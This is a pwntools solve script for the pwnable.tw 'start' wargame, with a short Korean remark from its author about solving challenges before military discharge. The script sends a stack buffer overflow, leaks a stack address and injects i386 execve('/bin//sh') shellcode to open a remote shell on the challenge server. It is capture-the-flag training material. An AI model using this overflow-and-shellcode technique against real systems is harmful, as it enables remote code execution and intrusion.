from pwn import *
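# Solve script for a pwnable.tw wargame binary (local name ./start, see the
# commented-out process() line). It performs two writes: the first makes the
# service echo back a 4-byte value, the second places code right after an
# overwritten address. Returning into bytes the client just sent only works
# where that memory is executable and nothing validates the overwritten
# address (presumably no NX / stack canary on this training binary -- confirm
# with a checksec-style inspection of ./start).

# Fixed typo: the attribute is `log_level`; `lo_level` is not a pwntools
# context setting, so debug logging was never enabled by the original line.
context.log_level = "debug"

p = remote("chall.pwnable.tw", 10000)
#p = process("./start")  # local copy of the binary, for offline testing

# Two fixed addresses inside the target; only `main` is used below.
# NOTE(review): what lives at these addresses is not visible here -- the
# names are the author's labels.
ret = 0x0804809c
main = 0x08048087

# Stage 1: 0x14 (20) filler bytes followed by `main` packed as a 32-bit value.
# Presumably the filler spans the target's buffer up to a saved return
# address, so execution re-enters the program and prints stack contents.
leak = b"A" * 0x14
leak += p32(main)
#leak += p32(ret)
p.recvuntil(b":")
p.send(leak)
sleep(0.1)  # give the service time to respond before reading

# The first 4 bytes of the reply are decoded as a 32-bit address.
# recv(4) returns *at most* 4 bytes; u32() raises if fewer arrive.
shell_addr = u32(p.recv(4))
log.info("shell code addr: " + hex(shell_addr))

# 25 bytes of i386 Linux machine code: pushes the string "/bin//sh" and issues
# syscall 0x0b (execve) through int 0x80.
shell = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

# Stage 2: same 20-byte filler, then the leaked value + 0x14, then the code.
# NOTE(review): the +0x14 offset presumably makes the overwritten address
# point at the bytes that immediately follow it -- confirm against the
# binary's stack layout.
payload = b"A" * 0x14
payload += p32(shell_addr + 0x14)
payload += shell
sleep(1)
p.send(payload)

# Hand the connection over to the terminal.
p.interactive()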
전역도 2달인가 남아서 복학하면 워겜은 많이 안 할 것 같아서 전역하기 전까지 tw 열심히(?) 풀어 볼까 합니다